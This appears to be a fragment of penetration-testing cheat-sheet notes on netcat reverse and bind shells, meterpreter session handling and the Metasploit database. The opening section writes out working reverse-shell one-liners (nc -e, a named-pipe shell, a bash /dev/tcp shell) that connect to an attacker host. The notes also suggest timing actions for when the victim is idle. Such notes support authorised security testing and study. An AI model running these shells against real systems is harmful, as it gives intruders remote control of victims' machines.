- Important notes
  Linux nc
  On your own system: [rlwrap] nc -lnvp 9998 (l = listen, v = verbose, p = port, n = no name resolution)
  On the target: nc -e /bin/sh 10.0.3.4 4444
  Alternative:
  mknod /tmp/backpipe p
  /bin/sh 0</tmp/backpipe | nc $attacker 4444 1>/tmp/backpipe
  Alternative: /bin/bash -c 'bash -i >& /dev/tcp/$attacker/4444 0>&1'
  If nc doesn't seem to be on the system: try a Perl reverse shell!
  Bind shell
  On…
- Upgrade a shell to a meterpreter shell: sessions -u $session_id
  Caution: the buildtuple may be the wrong architecture.
  Show processes: ps
  Show how long the user has been away from his/her computer (try things that could pop up shells preferably after the system has been idle for some time): idletime
  Migrate into another process to make the connection…
- The usual stuff:
  workspace -a host42 // To create a new workspace
  workspace host42 // To open an existing workspace
  db_nmap ...
  hosts
  services
  ...
  search smb type:auxiliary
  ...
  vulns // Shows all found vulnerabilities
  creds // Shows all found credentials
  General usage, Payloads, Working with sessions, Using the database
  A database can be used to store information, payloads, etc. To create an initial db,…